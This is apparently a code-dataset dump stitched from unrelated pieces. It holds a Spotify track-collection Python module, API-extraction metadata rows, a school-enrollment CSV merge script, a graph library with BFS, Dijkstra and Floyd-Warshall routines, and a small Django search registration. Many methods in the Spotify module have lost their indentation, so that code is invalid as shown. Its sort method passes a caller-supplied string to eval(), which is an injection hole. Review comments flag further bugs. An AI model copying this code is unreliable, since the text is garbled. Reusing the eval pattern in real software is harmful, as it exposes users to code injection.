        df_all_albums = pd.DataFrame(all_albums).drop(columns="artists")
        df_audio_features = pd.DataFrame(all_audio_features)
        df_all_tracks = pd.DataFrame(all_tracks)
        # Replace the nested album dict with a plain album_id foreign key.
        df_all_tracks.loc[:, "album_id"] = df_all_tracks["album"].apply(
            lambda x: x["id"]
        )
        df_all_tracks.drop(columns=["album", "audio_features"], inplace=True)
        df_album_artist = pd.DataFrame(album_artist)
        return (
            df_all_tracks,
            df_all_artists,
            df_all_albums,
            df_audio_features,
            df_album_artist,
        )
def shuffle(self) -> "TrackCollection":
"""Shuffle items
Returns:
TrackCollection: Object with items shuffled.
"""
new_items_list = copy.copy(list(self.items))
random.shuffle(new_items_list)
new_items = (item for item in new_items_list)
return TrackCollection(
_items=new_items, _audio_features_enriched=self._audio_features_enriched
)
def random(self, N: int) -> "TrackCollection":
"""Sample items randomly
Args:
N (int): Number of items to pick
Returns:
TrackCollection: Object with new items
"""
def new_items(N):
all_items = list(self.items)
k = min(N, len(all_items))
yield from random.sample(all_items, k=k)
return TrackCollection(
_items=new_items(N), _audio_features_enriched=self._audio_features_enriched
)
def remove_remixes(self) -> "TrackCollection":
"""Remove remixes from items
Returns:
TrackCollection: Object with new items
"""
banned_words = ["remix", "mixed"]
def new_items():
for item in self.items:
if all(
[
(banned_word not in item.name.lower())
for banned_word in banned_words
]
):
yield item
return TrackCollection(
_items=new_items(), _audio_features_enriched=self._audio_features_enriched
)
def sort(self, by: str, ascending: bool = True) -> "TrackCollection":
"""Sort items
Args:
by (str): Criteria used for sorting
ascending (bool, optional): Ascending order. Defaults to True.
Returns:
TrackCollection: Object with sorted items
"""
str_attr = f"item.{by}"
def new_items():
# Enrichment with audio features if needed
if by.startswith("audio_features") and not self._audio_features_enriched:
all_items = self._enrich_with_audio_features(items=self.items)
self._audio_features_enriched = True
else:
all_items = self.items
sorted_items = sorted(
list(all_items),
key=eval(f"lambda item: {str_attr}"),
reverse=(not ascending),
)
yield from sorted_items
return TrackCollection(
_items=new_items(), _audio_features_enriched=self._audio_features_enriched
)
    def filter(self, criteria_func: Callable[..., Any]) -> "TrackCollection":
        """Filter items by certain criteria function

        Args:
            criteria_func (Callable[..., Any]): Criteria used for filtering

        Returns:
            TrackCollection: Object with filtered items
        """
        # Enrichment with audio features if needed
        def new_items():
            # The predicate's source text decides whether enrichment is required.
            # NOTE(review): inspect.getsource raises for callables without
            # retrievable source (built-ins, REPL lambdas) — confirm callers.
            if (
                "audio_features" in inspect.getsource(criteria_func)
                and not self._audio_features_enriched
            ):
                self._audio_features_enriched = True
                all_items = self._enrich_with_audio_features(items=self.items)
            else:
                all_items = self.items
            for item in all_items:
                if criteria_func(item):
                    yield item
        return TrackCollection(
            _items=new_items(), _audio_features_enriched=self._audio_features_enriched
        )
    def insert_at_time_intervals(self, other, time: int):
        """Splice *other*'s tracks back in every *time* minutes of playback.

        Args:
            other: Collection whose tracks are inserted at each interval boundary.
            time (int): Interval length in minutes.

        Returns:
            TrackCollection: Collection yielding the interleaved stream.
        """
        def new_items(time):
            # NOTE(review): tee(..., 20) hard-caps the number of insertions at 20;
            # dups[i_dup] raises IndexError if more intervals elapse — confirm.
            dups = itertools.tee(other.items, 20)
            i_dup = 0
            cum_time = 0
            for item in self.items:
                prev_cum_time = cum_time
                cum_time += item.duration_ms / 1000 / 60  # ms -> minutes
                yield item
                # Boundary crossed when the running total wraps modulo `time`.
                if cum_time % time < prev_cum_time % time:
                    yield from dups[i_dup]
                    i_dup += 1
                    cum_time = 0
        return TrackCollection(_items=new_items(time))

    def insert_at_time(self, other, time: int):
        """Splice *other*'s tracks in after each *time* minutes of playback.

        Args:
            other: Collection whose tracks are inserted.
            time (int): Interval length in minutes.

        Returns:
            TrackCollection: Collection yielding the interleaved stream.
        """
        def new_items(time):
            cum_time = 0
            for item in self.items:
                prev_cum_time = cum_time
                cum_time += item.duration_ms / 1000 / 60  # ms -> minutes
                yield item
                if cum_time % time < prev_cum_time % time:
                    # NOTE(review): if other.items is a one-shot generator it is
                    # exhausted after the first insertion, so later insertions
                    # yield nothing — confirm intent.
                    yield from other.items
        return TrackCollection(_items=new_items(time))
def insert_at_position(self, other, position: int):
def new_items(position):
before, after = itertools.tee(self.items, 2)
yield from itertools.islice(before, position)
yield from other.items
yield from after
return TrackCollection(_items=new_items(position))
    def add_audio_features(self) -> "TrackCollection":
        """Return a collection whose items are lazily enriched with audio features.
        Returns:
            TrackCollection: Collection flagged as audio-feature-enriched.
        """
        def new_items():
            for item in self.items:
                # One API call per track. NOTE(review): get_audio_features
                # takes a list of ids, so this could be batched -- confirm
                # against API rate limits.
                item.audio_features = AudioFeaturesItem.from_dict(
                    get_audio_features(track_ids=[item.id])[item.id]
                )
                yield item
        return TrackCollection(_items=new_items(), _audio_features_enriched=True)
    def _enrich_with_audio_features(self, items: List[TrackItem]) -> List[TrackItem]:
        """Lazily enrich items with audio features.
        Note: despite the return annotation this is a generator function --
        it yields enriched items one by one rather than returning a list.
        Args:
            items (List[TrackItem]): Items to enrich
        Yields:
            TrackItem: Item with its ``audio_features`` attribute populated.
        """
        for item in items:
            item.audio_features = AudioFeaturesItem.from_dict(
                get_audio_features(track_ids=[item.id])[item.id]
            )
            yield item
def set_id(self, id_: str) -> "TrackCollection":
"""Add ID to collection, e.g. to use for storage in a database
Returns:
TrackCollection: Same collection, but with ID
"""
return TrackCollection(
id_=id_,
_items=self.items,
_audio_features_enriched=self._audio_features_enriched,
)
def remove_duplicates(self: "TrackCollection") -> "TrackCollection":
"""Remove duplicate tracks from items based on ID
Returns:
TrackCollection: Collection with no duplicate tracks
"""
# By ID
items = copy.copy(self.items)
idx = 0
while idx < len(items):
names = [item.name for item in items]
if items[idx].name in names[:idx]:
items.pop(idx)
else:
idx += 1
new_coll = copy.deepcopy(self)
new_coll._items = items
return new_coll
def first(self, n: int) -> "TrackCollection":
"""First n items
Returns:
TrackCollection: Collection with trimmed items
"""
new_items = itertools.islice(self.items, n)
return TrackCollection(
_items=new_items, _audio_features_enriched=self._audio_features_enriched
)
    def to_playlist(self, playlist_name: str = None) -> None:
        """Persist this collection as a Spotify playlist.
        Args:
            playlist_name (str, optional): Playlist title; defaults to the
                collection's own id when omitted.
        """
        if playlist_name is None:
            playlist_name = self.id_
        make_new_playlist(sp=self.sp, playlist_name=playlist_name, items=self.items)
    def to_database(self, db: database.SpotifyDatabase = None) -> None:
        """Store this collection in a database.
        Args:
            db (database.SpotifyDatabase, optional): Target database; the
                CollectionDatabase singleton is used when omitted.
        Raises:
            DatabaseNotLoaded: If the singleton database has no file path yet.
        """
        logger.info(f"Storing collection to database. id = {self.id_}")
        if db is None:
            db = CollectionDatabase()
        if not db.is_loaded():
            raise DatabaseNotLoaded
        db.store_tracks_in_database(collection=self)
    def optimize(self, target_func, N: int = None) -> None:
        """Keep the ``N`` items whose ``target_func`` score is closest to zero.
        Args:
            target_func: Callable mapping an item to a numeric score.
            N (int, optional): Number of items to keep; defaults to all.
        Returns:
            TrackCollection: Collection with the best-matching items ordered
            from best to worst.  Note: the annotated ``None`` return type is
            inaccurate -- a collection is returned.
        """
        items = list(self.items)
        if N is None:
            N = len(items)
        # Absolute distance of every item's score, then a stable argsort.
        diffs = np.abs(np.array([target_func(item) for item in items]))
        idx = np.argsort(diffs)
        n = min(N, len(items))
        return TrackCollection(_items=list(np.array(items)[idx[:n]]))
def complex_sort(
self, by: str = "artist", graph: nx.Graph = nx.Graph()
) -> "TrackCollection":
items = list(self.items)
def new_items():
unique_artists = list(set([item.album.artists[0].id for item in items]))
artists = [
(
artist_id,
[item for item in items if item.album.artists[0].id == artist_id],
)
for artist_id in unique_artists
]
remaining_artists = artists
latest_artist = remaining_artists.pop(0)
new_items_ = [track for track in latest_artist[1]]
while remaining_artists:
# Find the closest artist
all_path_lengths = []
for artist in remaining_artists:
try:
path_length = nx.shortest_path_length(
graph,
source=latest_artist[0],
target=artist[0],
weight="weight",
)
except nx.NetworkXNoPath as e:
path_length = 9999999
all_path_lengths.append(path_length)
# Get the minimum
all_path_lengths = np.array(all_path_lengths)
min_idx = np.where(all_path_lengths == all_path_lengths.min())[0][0]
# Set the latest artist
latest_artist = remaining_artists.pop(min_idx)
# Add the tracks
new_items_ += [track for track in latest_artist[1]]
return (item for item in new_items_)
return TrackCollection(
_items=new_items(), _audio_features_enriched=self._audio_features_enriched
)
@dataclass
class Playlist(TrackCollection):
    """TrackCollection backed by a Spotify playlist."""
    @classmethod
    def func_get_id(cls, name):
        # Resolve a playlist name to its Spotify ID.
        return get_playlist_id(sp=cls.sp, playlist_name=name)
    @property
    def _db_track_gen(self):
        # No playlist-specific database loader; defer to the base class.
        return super()._db_track_gen
    @property
    def _api_track_gen(self):
        # Stream the playlist's tracks from the Spotify API.
        return get_playlist_tracks(sp=self.sp, playlist_id=self.id_)
class Album(TrackCollection):
    """Class representing an Album's track contents"""
    @classmethod
    def func_get_id(cls, name):
        # Resolve an album name to its Spotify ID.
        return get_album_id(sp=cls.sp, album_name=name)
    @property
    def _db_track_gen(self):
        # Load the album's tracks from the local collection database.
        db = CollectionDatabase()
        return db.load_album(album_id=self.id_)
    @property
    def _api_track_gen(self):
        # Stream the album's tracks from the Spotify API.
        return get_album_songs(sp=self.sp, album_id=self.id_)
class Artist(TrackCollection):
    """Class representing an Artist's track contents"""
    @classmethod
    def func_get_id(cls, name):
        # Resolve an artist name to their Spotify ID.
        return get_artist_id(sp=cls.sp, artist_name=name)
    @property
    def _db_track_gen(self):
        # Load the artist's tracks from the local collection database.
        db = CollectionDatabase()
        return db.load_artist(artist_id=self.id_)
    @property
    def _api_track_gen(self):
        # Fall back to streaming every album's tracks from the API.
        return self.all_songs()
    def popular(self) -> "Artist":
        """Popular songs for the artist
        Returns:
            Artist: Artist with items set to the popular songs only
        """
        def items():
            for track_dict in get_artist_popular_songs(sp=self.sp, artist_id=self.id_):
                yield TrackItem.from_dict(track_dict)
        return Artist(id_=self.id_, _items=items())
    def all_songs(self) -> "Artist":
        """All songs by the artist.
        Note: this is a generator function -- it yields TrackItem objects,
        not an Artist as the annotation suggests.
        Yields:
            TrackItem: Every track from every album of the artist.
        """
        # Build album collections
        # NOTE(review): get_artist_albums is called without sp=, unlike the
        # other API helpers in this file -- confirm its signature.
        album_data = get_artist_albums(artist_id=self.id_)
        album_collection_items = [Album.from_id(album["id"]) for album in album_data]
        album_collection = CollectionCollection(collections=album_collection_items)
        # Retrieve items from album collection
        if album_collection:
            yield from album_collection.items
    def related_artists(self, n: int, include: bool = True) -> "ArtistCollection":
        """Artists related to the artist
        Args:
            n (int): The number of related artists
            include (bool): Whether the original artist should be included
        Returns:
            ArtistCollection: Collection of related artists
        """
        related_artist_items = get_related_artists(sp=self.sp, artist_id=self.id_)
        if include:
            # Count the artist itself on top of the n related ones.
            related_artist_items.append(self)
            n += 1
        # NOTE(review): the appended `self` is an Artist object while the API
        # entries are dicts indexed with ["id"]; if `self` falls inside the
        # first n entries this raises TypeError -- confirm intended.
        related_artists = [
            Artist(id_=artist_item["id"]) for artist_item in related_artist_items[:n]
        ]
        return ArtistCollection(collections=related_artists)
class SavedTracks(TrackCollection):
    """Class representing an saved track contents"""
    def __init__(self):
        # Deliberately bypasses the dataclass-generated __init__ of
        # TrackCollection; only these two fields are populated.
        self._items = []
        self.id_ = "Saved tracks"
    @property
    def _db_track_gen(self):
        # No dedicated database loader; defer to the base class.
        return super()._db_track_gen
    @property
    def _api_track_gen(self):
        # Stream the user's saved ("liked") tracks from the Spotify API.
        return get_all_saved_tracks(sp=self.sp)
@dataclass
class CollectionCollection(TrackCollection):
    """A TrackCollection composed of several sub-collections."""
    # Sub-collections whose items are concatenated or interleaved.
    collections: List[TrackCollection] = field(default_factory=list)
    def item_gen(self):
        # Concatenate all sub-collections in order.
        # NOTE(review): sum() starts from 0, so this relies on
        # TrackCollection defining __radd__/__add__ -- confirm.
        if self.collections:
            yield from sum(self.collections).items
    def alternate(self):
        """Round-robin the sub-collections' items (a1, b1, c1, a2, b2, ...).
        Stops at the shortest sub-collection (zip semantics).
        """
        def new_items():
            return itertools.chain(*zip(*[c.items for c in self.collections]))
        return TrackCollection(id_="", _items=new_items())
@dataclass
class ArtistCollection(CollectionCollection):
    """Class representing a collection of artists"""
    collections: List[Artist] = field(default_factory=list)
    def popular(self) -> TrackCollection:
        """Popular songs of a given artist collection
        Returns:
            TrackCollection: New collection with all popular songs
        """
        # Sum of the per-artist "popular" collections, in artist order.
        return sum([artist.popular() for artist in self.collections])
class Genre(TrackCollection):
    """Class representing an genre's track contents"""
    def __init__(self, genre_name: str = "") -> None:
        # NOTE(review): id_ is never assigned here although the items property
        # reads self.id_ -- presumably the dataclass default on
        # TrackCollection provides it; confirm.
        self.genre_name = genre_name
        self._items = []
    @property
    def items(self) -> List[TrackItem]:
        """Recommended tracks for this genre.
        NOTE(review): because this function contains `yield` it is a
        generator; the `return self._items` branch terminates the generator
        *without yielding anything* -- it likely should be
        `yield from self._items`.  Confirm before relying on cached items.
        """
        if self._items:
            return self._items
        else:
            if self.id_:
                yield from get_recommendations_for_genre(
                    sp=self.sp, genre_names=[self.genre_name]
                )
            else:
                # Empty collection: yield nothing.
                yield from iter(())
class Show(TrackCollection):
    """Class representing an show's episode contents"""
    @classmethod
    def func_get_id(cls, name):
        # Resolve a show name/query to its Spotify ID.
        return get_show_id(sp=cls.sp, query=name)
    @property
    def _db_track_gen(self):
        # Database loading for shows is not implemented yet.
        return self._api_track_gen  # TBD
    @property
    def _api_track_gen(self):
        # Stream the show's episodes from the Spotify API.
        for ep_dict in get_show_episodes(sp=self.sp, show_id=self.id_):
            yield EpisodeItem.from_dict(ep_dict)
    def item_gen(self):
        # Shows always come from the API (see _db_track_gen above).
        yield from self._api_track_gen
class Track(TrackCollection):
    """Class representing a single-track collection"""
    def __init__(self, id_: str):
        # Eagerly look the track up by ID; the collection holds exactly one
        # item, wrapped in a one-shot iterator.
        self.id_ = id_
        self._items = iter([TrackItem.from_dict(read_track_from_id(track_id=id_))])
    @classmethod
    def func_get_id(cls, name):
        # Resolve a track name to its Spotify ID.
        return get_track_id(sp=cls.sp, track_name=name)
class CollectionDatabase(
    database.SpotifyDatabase, metaclass=database.DatabaseSingleton
):
    """Singleton database used to persist track collections."""
    def __init__(self, file_path=None, op_table=None):
        super().__init__(file_path=file_path, op_table=op_table)
    def is_loaded(self):
        # Usable once init_db() has supplied a file path to the singleton.
        return self.file_path is not None
def init_db(db_path):
    """Initialize the CollectionDatabase singleton with the given file path."""
    CollectionDatabase(file_path=db_path, op_table="operations")
| [
"logging.getLogger",
"itertools.islice",
"random.sample",
"copy.deepcopy",
"random.shuffle",
"dataclasses.asdict",
"itertools.tee",
"networkx.Graph",
"networkx.shortest_path_length",
"numpy.argsort",
"numpy.array",
"inspect.getsource",
"spotify_flows.database.SpotifyDatabase",
"pandas.Data... | [((1263, 1282), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (1280, 1282), False, 'import logging\n'), ((1788, 1815), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (1793, 1815), False, 'from dataclasses import dataclass, field, asdict\n'), ((20879, 20906), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (20884, 20906), False, 'from dataclasses import dataclass, field, asdict\n'), ((21347, 21374), 'dataclasses.field', 'field', ([], {'default_factory': 'list'}), '(default_factory=list)\n', (21352, 21374), False, 'from dataclasses import dataclass, field, asdict\n'), ((1895, 1910), 'copy.copy', 'copy.copy', (['self'], {}), '(self)\n', (1904, 1910), False, 'import copy\n'), ((3193, 3244), 'spotify_flows.database.SpotifyDatabase', 'database.SpotifyDatabase', (['db_path'], {'op_table': '"""table"""'}), "(db_path, op_table='table')\n", (3217, 3244), True, 'import spotify_flows.database as database\n'), ((7116, 7141), 'pandas.DataFrame', 'pd.DataFrame', (['all_artists'], {}), '(all_artists)\n', (7128, 7141), True, 'import pandas as pd\n'), ((7243, 7275), 'pandas.DataFrame', 'pd.DataFrame', (['all_audio_features'], {}), '(all_audio_features)\n', (7255, 7275), True, 'import pandas as pd\n'), ((7301, 7325), 'pandas.DataFrame', 'pd.DataFrame', (['all_tracks'], {}), '(all_tracks)\n', (7313, 7325), True, 'import pandas as pd\n'), ((7544, 7570), 'pandas.DataFrame', 'pd.DataFrame', (['album_artist'], {}), '(album_artist)\n', (7556, 7570), True, 'import pandas as pd\n'), ((7959, 7989), 'random.shuffle', 'random.shuffle', (['new_items_list'], {}), '(new_items_list)\n', (7973, 7989), False, 'import random\n'), ((14164, 14185), 'copy.copy', 'copy.copy', (['self.items'], {}), '(self.items)\n', (14173, 14185), False, 'import copy\n'), ((14427, 14446), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (14440, 14446), False, 'import copy\n'), ((14689, 
14720), 'itertools.islice', 'itertools.islice', (['self.items', 'n'], {}), '(self.items, n)\n', (14705, 14720), False, 'import itertools\n'), ((15633, 15650), 'numpy.argsort', 'np.argsort', (['diffs'], {}), '(diffs)\n', (15643, 15650), True, 'import numpy as np\n'), ((15827, 15837), 'networkx.Graph', 'nx.Graph', ([], {}), '()\n', (15835, 15837), True, 'import networkx as nx\n'), ((6747, 6760), 'dataclasses.asdict', 'asdict', (['track'], {}), '(track)\n', (6753, 6760), False, 'from dataclasses import dataclass, field, asdict\n'), ((6936, 6955), 'dataclasses.asdict', 'asdict', (['track.album'], {}), '(track.album)\n', (6942, 6955), False, 'from dataclasses import dataclass, field, asdict\n'), ((11460, 11490), 'itertools.tee', 'itertools.tee', (['other.items', '(20)'], {}), '(other.items, 20)\n', (11473, 11490), False, 'import itertools\n'), ((12466, 12494), 'itertools.tee', 'itertools.tee', (['self.items', '(2)'], {}), '(self.items, 2)\n', (12479, 12494), False, 'import itertools\n'), ((7166, 7190), 'pandas.DataFrame', 'pd.DataFrame', (['all_albums'], {}), '(all_albums)\n', (7178, 7190), True, 'import pandas as pd\n'), ((8529, 8558), 'random.sample', 'random.sample', (['all_items'], {'k': 'k'}), '(all_items, k=k)\n', (8542, 8558), False, 'import random\n'), ((12518, 12552), 'itertools.islice', 'itertools.islice', (['before', 'position'], {}), '(before, position)\n', (12534, 12552), False, 'import itertools\n'), ((17096, 17122), 'numpy.array', 'np.array', (['all_path_lengths'], {}), '(all_path_lengths)\n', (17104, 17122), True, 'import numpy as np\n'), ((10824, 10856), 'inspect.getsource', 'inspect.getsource', (['criteria_func'], {}), '(criteria_func)\n', (10841, 10856), False, 'import inspect\n'), ((15725, 15740), 'numpy.array', 'np.array', (['items'], {}), '(items)\n', (15733, 15740), True, 'import numpy as np\n'), ((16641, 16735), 'networkx.shortest_path_length', 'nx.shortest_path_length', (['graph'], {'source': 'latest_artist[0]', 'target': 'artist[0]', 'weight': 
'"""weight"""'}), "(graph, source=latest_artist[0], target=artist[0],\n weight='weight')\n", (16664, 16735), True, 'import networkx as nx\n')] |
#!/usr/bin/env python
"""Merge public and nonpublic enrollment tab-separated files into popcounts.csv.

Each output row ends with a bitmask of the grades served:
bit 0 = PK/KG/ECSE, bit n = grade n.
"""
import csv
import string
import sys

# All print() output below goes to the CSV file.
sys.stdout = open('popcounts.csv', 'wt')

# --- Public schools: one row per grade, terminated by an 'All Grades' row. ---
with open('public_enrollment.txt') as f:
    pub = csv.reader(f, csv.excel_tab)
    next(pub)  # skip header
    grades = 0  # bitmask accumulated since the last 'All Grades' row
    for r in pub:
        r = [n.replace(',', '') for n in r]
        school = '{:04d}-{:02d}-{:03d}'.format(int(r[3]), int(r[4]), int(r[6]))
        if r[11] == 'All Grades':
            data = [school, r[5], r[7], r[2], r[12], str(grades)]
            print(','.join(_.strip() for _ in data))
            grades = 0
        else:
            try:
                grades |= 2 ** int(r[11])
            except ValueError:
                # Pre-kindergarten variants all map to bit 0.
                if r[11] in ('KG', 'PK', 'ECSE'):
                    grades |= 1  # 2**0

# --- Nonpublic schools: columns 6..18 hold per-grade enrollment counts. ---
with open('nonpublic_enrollment.txt', 'rt') as f:
    nonpub = csv.reader(f, csv.excel_tab)
    next(nonpub)  # skip header
    for r in nonpub:
        r = [n.replace(',', '') for n in r]
        school = '{:04d}-{:02d}-{:03d}'.format(int(r[1]), int(r[2]), int(r[4]))
        grades = 0
        for n in range(6, 19):
            if r[n] != '0':
                grades |= 2 ** (n - 6)
        # (The old version first built `data` without the bitmask and then
        # immediately overwrote it -- that dead assignment is removed.)
        data = [school, r[3], r[5], r[27], r[21], str(grades)]
        print(','.join(string.capwords(_.strip()) for _ in data))
| [
"csv.reader"
] | [((100, 128), 'csv.reader', 'csv.reader', (['f', 'csv.excel_tab'], {}), '(f, csv.excel_tab)\n', (110, 128), False, 'import csv\n'), ((766, 794), 'csv.reader', 'csv.reader', (['f', 'csv.excel_tab'], {}), '(f, csv.excel_tab)\n', (776, 794), False, 'import csv\n')] |
from libs.graph.DLinkedList import Queue, DoubledLinkedList as List
from libs.graph.PriorityQueue import PriorityQueueBinary as PriorityQueue
from libs.graph.Tree import *
#it is better to use a DoubledLinkedList to operate with a great efficiency on
#the lists those will be used in the graph representation
class Node:
    def __init__(self, elem, index, weight = None):
        """
        this class represents a graph node
        :param elem: an object stored into the node
        :param index: int, the index by which the node may be identified
        :param weight: int, the weight of the node and of his object - may not be used
        """
        self._elem = elem
        self._index = index
        self._weight = weight
        self._token = None #used to mark each node during a generic visit
        self._distance = 0 #used to set and retrieve the distance of the node in the visit
        self._knights = 0 #used to keep trace of the knights in the node
        self._knights_arrived = []  # NOTE(review): never written elsewhere in this file -- confirm still needed
    def get_elem(self):
        """
        :return: object stored in the node
        """
        return self._elem
    def get_index(self):
        """
        :return: int, the index of the node
        """
        return self._index
    def get_weight(self):
        """
        :return: int, the weight of the node
        """
        return self._weight
    def get_token(self):
        """
        :return: int, the token of the node
        """
        return self._token
    def set_token(self, token):
        """
        :param token: int, the validation token
        :return: None
        """
        self._token = token
    def get_node(self):
        """
        :return: tuple, (elem, weight) -- note: the node's index is NOT
            included, contrary to what this docstring previously stated
        """
        return self.get_elem(), self.get_weight()
    def set_distance(self, dist):
        """
        this function can be used to set a particular distance in order to provide
        a good interface for BFS and Dijkstra shortest-path algorithms.
        Note: despite the name it *accumulates* the distance (+=) and also
        increments the knight counter as a side effect.
        :param dist: int, distance
        :return: None
        """
        self._distance += dist
        self._knights += 1
    def get_distance(self):
        """
        :return: int, the (accumulated) distance calculated for the node
        """
        return self._distance
    def get_count(self):
        """
        :return: int, the number of knights
        """
        return self._knights
#I'll use an AdjacenceList Graph because of the unitarian value of all the arcs
class GraphAdjacenceList:
    def __init__(self):
        """
        this class represents a graph using an adjacency list style
        """
        self._nodes = dict() #to store the nodes
        self._adjacency = dict() #to link the nodes to their adjacence list
        self._nextId = 0 #it will be used to store the nodes - id > 0
        self._nodes_elems = dict() #it will be used to store the elems inserted
    def getNodes(self):
        """
        this function is used as an interface to retrieve graph's nodes
        :return: (dictionary, dictionary) the nodes and their adjacency lists
        """
        return self._nodes, self._adjacency
    def insertNode(self, elem, weight = None):
        """
        this function allows the user to insert a node into the graph
        :param elem: the elem to be stored into the node
        :param weight: the weight of the node
        :return: Node, the node already inserted or just inserted
        """
        if elem in self._nodes_elems:
            #if a node has already been inserted it will be returned -
            #dictionary membership is O(1) on average
            return self._nodes_elems[elem]
        newNode = Node(elem, self._nextId, weight)
        self._nodes[newNode.get_index()] = newNode
        self._adjacency[newNode.get_index()] = List()
        self._nextId += 1
        #storing the elem just inserted
        self._nodes_elems[elem] = newNode
        return newNode
    def linkNode(self, tail, head):
        """
        this function links two nodes in a direct connection
        :param tail: Node, the tail node
        :param head: Node, the head node
        :return: None
        """
        adj = self._adjacency[tail.get_index()]
        if head not in adj.getLastAddedList():
            #avoid duplicate arcs
            adj.addAsLast(head)
    def printGraph(self):
        """
        this function builds a well formatted visualization of the nodes
        :return: None
        """
        print("Adjacency Lists:")
        for identifier in self._nodes:
            print("node", self._nodes[identifier].get_elem(), self._nodes[identifier].get_weight())
            self._adjacency[identifier].printList()
            print("")
    def validateNodes(self, token):
        """
        this function validates all nodes with a token value in order to accomplish the visit
        :param token: int, the token value to validate the node. 0 if not visited, 21 if explored and 42 (for Douglas) if closed
        :return: None
        """
        nodes = self.getNodes()[0]
        #FIX: dict.itervalues() is Python 2 only and raised AttributeError on
        #Python 3 -- use values() instead.
        for node in nodes.values():
            node.set_token(token)
    def visitBFS(self, node):
        """
        this is a Breadth First Search starting from a vertex. Please note that all the operations are done on the leaves
        to let the algorithm be more modular (it doesn't seem to affect the computational time, which remains proportional
        to the dimension of the graph)
        :param node: Node, the starting vertex
        :return: Tree, representing the visit path
        """
        #initializing some useful constants (funny constants too)
        unexplored = 0
        explored = 21
        closed = 42 #So long and thanks for all the fish!
        #validating all the nodes as unexplored and starting from the vertex
        self.validateNodes(unexplored)
        node.set_token(explored)
        #initializing the tree containing the only vertex
        T_root = Leaf(node)
        T_root.setDistance(0.0) #using the float - it is not a counter value
        T = Tree(T_root)
        #initializing the fringe of the visit
        F = Queue()
        F.enqueue(T_root)
        while not F.isEmpty():
            u = F.dequeue()
            n = u.getElem()
            n.set_token(closed)
            for v in self._adjacency[n.get_index()].getLastAddedList():
                if v.get_token() == unexplored:
                    v.set_token(explored)
                    l = Leaf(v)
                    F.enqueue(l)
                    T.insertLeaf(l, u)
        return T
    def visitNodesBFS(self, Nodes):
        """
        this is a simple implementation of a Breadth First Search algorithm to visit the graph
        starting from a selected group of nodes
        :param Nodes: Node list containing the nodes from which start the visit
        :return: list of Trees, the list of all the visits
        """
        T_list = []
        for node in Nodes:
            tree = self.visitBFS(node)
            T_list.append(tree)
        return T_list
    #it is interesting to achieve the same result using minimum path algorithm of Dijkstra
    def Dijkstra(self, node):
        """
        this is a Dijkstra shortest path algorithm implementation starting from a vertex
        :param node: Node, the starting vertex
        :return: Tree, the shortest paths tree
        """
        INF = float('inf')
        self.validateNodes(INF)
        #we will use the nodes' tokens to store the distance info!
        node.set_token(0.0) #0-distance from itself!
        #initializing the tree
        T_root = Leaf(node)
        T_root.setDistance(node.get_token())
        T = Tree(T_root)
        #initializing a dictionary to keep trace of the leaves
        leaves = dict()
        leaves[node] = T_root
        #initializing the priority queue to mantain the fringe
        PQ = PriorityQueue()
        PQ.insert(T_root, node.get_token())
        while not PQ.isEmpty():
            u = PQ.deleteMin() #retrieving the min node from the leaf
            n = u.getElem()
            for v in self._adjacency[n.get_index()].getLastAddedList():
                if v.get_token() == INF:
                    l = Leaf(v)
                    leaves[v] = l #updating the leaves' dictionary
                    PQ.insert(l, n.get_token() + 1.0) #each edge will be unitary-cost
                    v.set_token(n.get_token() + 1.0)
                    T.insertLeaf(l, u)
                elif n.get_token() + 1.0 < v.get_token():
                    relaxed = n.get_token() + 1.0
                    leaves[v].setDistance(relaxed)
                    #updating the tree... (we are now saving in the priority queue the leaves)
                    leaves[v].setFather(u)
                    leaves[n].addSon(leaves[v])
                    #updating the priority queue
                    PQ.decreaseKey(leaves[v], relaxed)
                    v.set_token(relaxed)
        return T
    def visitDijkstra(self, Nodes):
        """
        this is an implementation of the Dijkstra algorithm to visit the graph
        starting from a selected group of nodes
        :param Nodes: Node list containing the nodes from which start the visit
        :return: list of Trees, the list of all the visits
        """
        T_list = []
        for node in Nodes:
            tree = self.Dijkstra(node)
            T_list.append(tree)
        return T_list
    #Pay attention!
    #   -Bellman condition to decide a shortest path -> for each node it is O(k*n) where k is node's degree
    #   -save the all available paths in a tree instead of a list of lists -> O(n) (if it is possible...)
    #   -the chessboard graph is a direct graph with all the arcs costing a single unit
    #    (please note that it is necessary to consider each knight own k-value in order to calculate
    #    the move number!!)
    #   -general purpose: in python the infinite is... INF = float('inf') -> comparisons using floats
    def FloydWarshall(self):
        """
        this is a simple implementation of the Floyd-Warshall algorithm using an O(n^2) space
        but O(n^3) computational complexity. Please note that in our case the chessboard graph
        is unitary-weight-arc created
        :return: list of lists, matrix of the distances between two vertices
        """
        INF = float('inf')
        nodes, adjacency = self.getNodes() #getting the dictionaries
        #FIX: on Python 3 dict.keys() returns a non-subscriptable view, so
        #indexes[i] below raised TypeError -- materialize it as a list.
        indexes = list(nodes.keys()) #it is the same to access the two dictionaries
        dim = len(indexes)
        #initializing the matrix
        dist = [[INF for m in range(dim)] for n in range(dim)]
        for i in range(dim):
            ind = indexes[i]
            dist[ind][ind] = 0.0
            adj_nodes = adjacency[ind].getLastAddedList()
            for adj in adj_nodes:
                to_ind = adj.get_index()
                dist[ind][to_ind] = 1.0
        #executing the dynamic programming algorithm
        for k in range(dim):
            for i in range(dim):
                for j in range(dim):
                    if dist[i][k] != INF and dist[k][j] != INF and dist[i][k] + dist[k][j] < dist[i][j]:
                        dist[i][j] = dist[i][k] + dist[k][j]
        return dist
| [
"libs.graph.DLinkedList.DoubledLinkedList",
"libs.graph.DLinkedList.Queue",
"libs.graph.PriorityQueue.PriorityQueueBinary"
] | [((3897, 3903), 'libs.graph.DLinkedList.DoubledLinkedList', 'List', ([], {}), '()\n', (3901, 3903), True, 'from libs.graph.DLinkedList import Queue, DoubledLinkedList as List\n'), ((6476, 6483), 'libs.graph.DLinkedList.Queue', 'Queue', ([], {}), '()\n', (6481, 6483), False, 'from libs.graph.DLinkedList import Queue, DoubledLinkedList as List\n'), ((8222, 8237), 'libs.graph.PriorityQueue.PriorityQueueBinary', 'PriorityQueue', ([], {}), '()\n', (8235, 8237), True, 'from libs.graph.PriorityQueue import PriorityQueueBinary as PriorityQueue\n')] |
from django.utils.translation import ugettext_lazy as _
from mayan.apps.documents.search import document_page_search, document_search
# Allow searching document pages by the text of their document's comments.
document_page_search.add_model_field(
    field='document_version__document__comments__comment',
    label=_('Comments')
)
